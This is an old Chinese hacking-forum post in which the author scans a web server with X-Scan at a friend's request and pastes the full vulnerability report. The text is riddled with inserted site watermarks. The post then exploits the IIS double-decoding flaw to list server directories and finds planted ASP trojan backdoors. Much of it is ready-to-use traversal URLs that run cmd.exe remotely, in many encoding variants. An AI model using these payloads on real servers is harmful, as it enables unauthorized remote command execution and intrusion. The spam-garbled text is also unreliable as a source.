今天无聊连家都回不去呵呵~~朋友叫测试个站
打开地址一看呆拉!!可能是他故意难我吧打开地址后就这样:
[[[正在建立您想要连接的站点目前没有默认页。可能正在被进行升级。
请稍候再试此站点。假如问题仍然存在,请与 Web 站点管理员联系。 ]]]
呵呵!!
不怕有句老话不会扫描那就不是一个真正的黑客
来该X-Scan上场
****.**.**.**
扫描结果如下:
X-Scan 检测报告
------------------
检测结果
- 存活主机 : 1
- 漏洞数量 : 22
- 警告数量 : 16
- 提示数量 : 6
主机列表
****.**.**.** (发现安全漏洞)
. OS: Windows; PORT/TCP: 21, 25, 53, 80, 443
Powered By Achely's Blog快乐开发技术文档
详细资料
.net开发技术文章javascript技巧尽在快乐开发****.**.**.** :
. 开放端口列表 :
o smtp (25/tcp) (发现安全警告)
o domain (53/tcp) (发现安全提示)
o www (80/tcp) (发现安全漏洞)
快乐开发技术文档o https (443/tcp) (发现安全提示)
o ftp (21/tcp) (发现安全提示)
devjoy.cn技术文档
. 端口"smtp (25/tcp)"发现安全警告 :
.net开发技术文章
SMTP服务器不支持用户身份验证,允许匿名用户使用
. 端口"smtp (25/tcp)"发现安全提示 :
A SMTP server is running on this port
一起娱乐网01716.com
Here is its banner :
javascript技巧尽在快乐开发
220 altsyz-web Microsoft ESMTP MAIL Service, Version: 5.0.2195.2966 ready at
Powered By Achely's Blog
Wed, 20 Oct 2004 06:28:38 +0800
devjoy.cn技术文档
NESSUS_ID : 10330
快乐开发技术文档
. 端口"domain (53/tcp)"发现安全提示 :
快乐开发技术文档
Maybe the "domain" service running on this port.
NESSUS_ID : 10330
. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
javascript技巧尽在快乐开发
Powered By Achely's Blog
. 端口"www (80/tcp)"发现安全漏洞 :
zhangyongjun.com开发网
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+di
. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
. 端口"www (80/tcp)"发现安全漏洞 :
zhangyongjun.com开发网IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
devjoy.cn技术文档
. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
. 端口"www (80/tcp)"发现安全漏洞 :
Powered By Achely's Blog快乐开发技术文档
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
.net开发技术文章javascript技巧尽在快乐开发. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
快乐开发技术文档. 端口"www (80/tcp)"发现安全漏洞 :
devjoy.cn技术文档
IIS编码/解码漏洞:
.net开发技术文章
http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
一起娱乐网01716.com
http://****.**.**.**/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir
javascript技巧尽在快乐开发
Powered By Achely's Blog
. 端口"www (80/tcp)"发现安全漏洞 :
devjoy.cn技术文档
IIS编码/解码漏洞:
快乐开发技术文档
http://****.**.**.**/scripts/..%u00255c..%u00255c..%u00255c..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir
快乐开发技术文档
. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
. 端口"www (80/tcp)"发现安全漏洞 :
javascript技巧尽在快乐开发
Powered By Achely's Blog
The remote Microsoft Frontpage server seems vulnerable to a remote
buffer overflow. Exploitation of this bug could give an unauthorized
zhangyongjun.com开发网
user access to the machine.
The following systems are known to be vulnerable:
Microsoft Windows 2000 Service Pack 2, Service Pack 3
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Office XP, Microsoft Office XP Service Release 1
Solution: Install relevant service pack or hotfix from URL below.
zhangyongjun.com开发网See als
http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx
Risk factor : High
CVE_ID : CAN-2003-0822, CAN-2003-0824
devjoy.cn技术文档
NESSUS_ID : 11923
Other references : IAVA:2003-A-0033
. 端口"www (80/tcp)"发现安全漏洞 :
There's a buffer overflow in the remote web server through
the ISAPI filter.
It is possible to overflow the remote web server and execute
commands as user SYSTEM.
Solution: See
http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx
Risk factor : High
CVE_ID : CVE-2001-0544, CVE-2001-0545, CVE-2001-0506, CVE-2001-0507,
CVE-2001-0508, CVE-2001-0500
BUGTRAQ_ID : 2690, 3190, 3194, 3195
NESSUS_ID : 10685
. 端口"www (80/tcp)"发现安全漏洞 :
The IIS server appears to have the .HTR ISAPI filter mapped.
Powered By Achely's Blog快乐开发技术文档
At least one remote vulnerability has been discovered for the .HTR
filter. This is detailed in Microsoft Advisory
.net开发技术文章MS02-018, and gives remote SYSTEM level access to the web server.
javascript技巧尽在快乐开发It is recommended that, even if you have patched this vulnerability,
you unmap the .HTR extension and any other unused ISAPI extensions
if they are not required for the operation of your site.
快乐开发技术文档Solution :
To unmap the .HTR extension:
devjoy.cn技术文档
1.Open Internet Services Manager.
2.Right-click the Web server choose Properties from the context menu.
3.Master Properties
.net开发技术文章
4.Select WWW Service -> Edit -> HomeDirectory -> Configuration
and remove the reference to .htr from the list.
In addition, you may wish to download and install URLSCAN from the
Microsoft Technet Website. URLSCAN, by default, blocks all requests
for .htr files.
一起娱乐网01716.com
Risk factor : High
javascript技巧尽在快乐开发
CVE_ID : CVE-2002-0071
Powered By Achely's Blog
BUGTRAQ_ID : 4474
devjoy.cn技术文档
NESSUS_ID : 10932
Other references : IAVA:2002-A-0002
快乐开发技术文档
快乐开发技术文档
. 端口"www (80/tcp)"发现安全漏洞 :
The remote server is vulnerable to a buffer overflow in the .HTR
javascript技巧尽在快乐开发
filter.
Powered By Achely's Blog
An attacker may use this flaw to execute arbitrary code on
zhangyongjun.com开发网
this host (although the exploitation of this flaw is considered
as being difficult).
Solution:
To unmap the .HTR extension:
1.Open Internet Services Manager.
2.Right-click the Web server choose Properties from the context menu.
3.Master Properties
4.Select WWW Service -> Edit -> HomeDirectory -> Configuration
and remove the reference to .htr from the list.
zhangyongjun.com开发网See MS bulletin MS02-028 for a patch
Risk factor : High
CVE_ID : CVE-2002-0364, CVE-2002-0071
devjoy.cn技术文档
BUGTRAQ_ID : 4855
NESSUS_ID : 11028
Other references : IAVA:2002-A-0002
. 端口"www (80/tcp)"发现安全漏洞 :
The remote WebDAV server may be vulnerable to a buffer overflow when
it receives a too long request.
An attacker may use this flaw to execute arbitrary code within the
LocalSystem security context.
*** As safe checks are enabled, Nessus did not actually test for this
*** flaw, so this might be a false positive
Solution : See
http://www.microsoft.com/technet/security/bulletin/ms03-007.mspx
Risk Factor : High
CVE_ID : CAN-2003-0109
BUGTRAQ_ID : 7116
NESSUS_ID : 11412
Other references : IAVA:2003-A-0005
. 端口"www (80/tcp)"发现安全漏洞 :
Powered By Achely's Blog快乐开发技术文档
.net开发技术文章javascript技巧尽在快乐开发When IIS receives a user request to run a script, it renders
the request in a decoded canonical form, then performs
security checks on the decoded request. A vulnerability
results because a second, superfluous decoding pass is
performed after the initial security checks are completed.
快乐开发技术文档Thus, a specially crafted request could allow an attacker to
execute arbitrary commands on the IIS Server.
devjoy.cn技术文档
Solution: See MS advisory MS01-026(Superseded by ms01-044)
See http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx
.net开发技术文章
Risk factor : High
CVE_ID : CVE-2001-0507, CVE-2001-0333
BUGTRAQ_ID : 2708
NESSUS_ID : 10671
一起娱乐网01716.com
javascript技巧尽在快乐开发
. 端口"www (80/tcp)"发现安全漏洞 :
Powered By Achely's Blog
devjoy.cn技术文档
快乐开发技术文档
快乐开发技术文档
There's a buffer overflow in the remote web server through
the ASP ISAPI filter.
It is possible to overflow the remote web server and execute
commands as user SYSTEM.
Solution: See
http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx
javascript技巧尽在快乐开发
Risk factor : High
Powered By Achely's Blog
CVE_ID : CVE-2002-0079, CVE-2002-0147, CVE-2002-0149
BUGTRAQ_ID : 4485
zhangyongjun.com开发网
NESSUS_ID : 10935
Other references : IAVA:2002-A-0002
. 端口"www (80/tcp)"发现安全警告 :
. 端口"www (80/tcp)"发现安全提示 :
A web server is running on this port
devjoy.cn技术文档
NESSUS_ID : 10330
Powered By Achely's Blog
Powered By Achely's Blog. 端口"www (80/tcp)"发现安全提示 :
快乐开发技术文档快乐开发技术文档
The remote web server type is :
Microsoft-IIS/5.0
快乐开发技术文档
Solution : You can use urlscan to change reported server for IIS.
NESSUS_ID : 10107
javascript技巧尽在快乐开发
. 端口"https (443/tcp)"发现安全提示 :
Powered By Achely's Blogjavascript技巧尽在快乐开发Maybe the "https" service running on this port.
.net开发技术文章NESSUS_ID : 10330
一起娱乐网01716.com快乐开发技术文档. 端口"ftp (21/tcp)"发现安全提示 :
快乐开发技术文档zhangyongjun.com开发网Maybe the "ftp" service running on this port.
NESSUS_ID : 10330》》》》》》》
快乐开发技术文档
一起娱乐网01716.com结果发现IIS解码漏洞
zhangyongjun.com开发网那怎么利用呢高手就不用问拉
莱鸟继续》》》
发现没http://***.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
这里要申明的是我讲的是找ASP木马后门
不做其它入侵
Powered By Achely's Blog
接下来我们打开它发现什么拉..................哈哈
Directory of d:\inetpub\scripts
Powered By Achely's Blog
2004-10-20 11:18 <DIR> .
2004-10-20 11:18 <DIR> ..
2004-10-20 10:34 1,169 admin_nighter.asp
zhangyongjun.com开发网
2004-10-20 10:48 29,451 nighterasp1.5.asp
devjoy.cn技术文档
2000-02-09 22:39 15,760 NSIISLOG.DLL
devjoy.cn技术文档2004-10-20 10:33 3,224 sniao.asp
一起娱乐网01716.com
2004-10-20 09:30 23,109 start.asp
一起娱乐网01716.com
2004-10-20 11:18 49,627 sx.asp
到这里应该明白是怎么回事情了吧
快乐开发技术文档
路径d:\inetpub
文件路径\scripts\
一起娱乐网01716.comadmin_nighter.asp
这就是木马